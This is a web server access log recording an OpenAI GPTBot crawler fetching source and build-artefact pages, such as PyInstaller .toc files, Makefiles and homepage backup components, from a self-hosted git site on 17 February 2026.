"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10958] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11896] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:16:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22103] [Gzip 11.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:16:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40478] [Gzip 14.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:16:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23496] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:16:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" +[17/Feb/2026:16:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16206] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:16:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16205] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" +[17/Feb/2026:16:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22138] [Gzip 11.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:16:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" +[17/Feb/2026:16:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" +[17/Feb/2026:16:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" +[17/Feb/2026:16:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23274] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:16:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40977] [Gzip 14.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:16:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" +[17/Feb/2026:16:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" +[17/Feb/2026:16:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23529] [Gzip 11.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:16:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16206] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:16:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23305] [Gzip 11.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:16:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40511] [Gzip 14.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:16:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22384] [Gzip 11.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:16:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40948] [Gzip 14.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:16:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" +[17/Feb/2026:16:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:16:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22351] [Gzip 11.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:16:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" +[17/Feb/2026:16:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14405] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" +[17/Feb/2026:16:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11795] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" +[17/Feb/2026:16:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:16:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=closed" [Client 74.7.227.38] [Length 8481] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:16:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13556] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13555] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 16702] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" +[17/Feb/2026:16:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" +[17/Feb/2026:16:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" +[17/Feb/2026:16:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11542] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" +[17/Feb/2026:16:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr 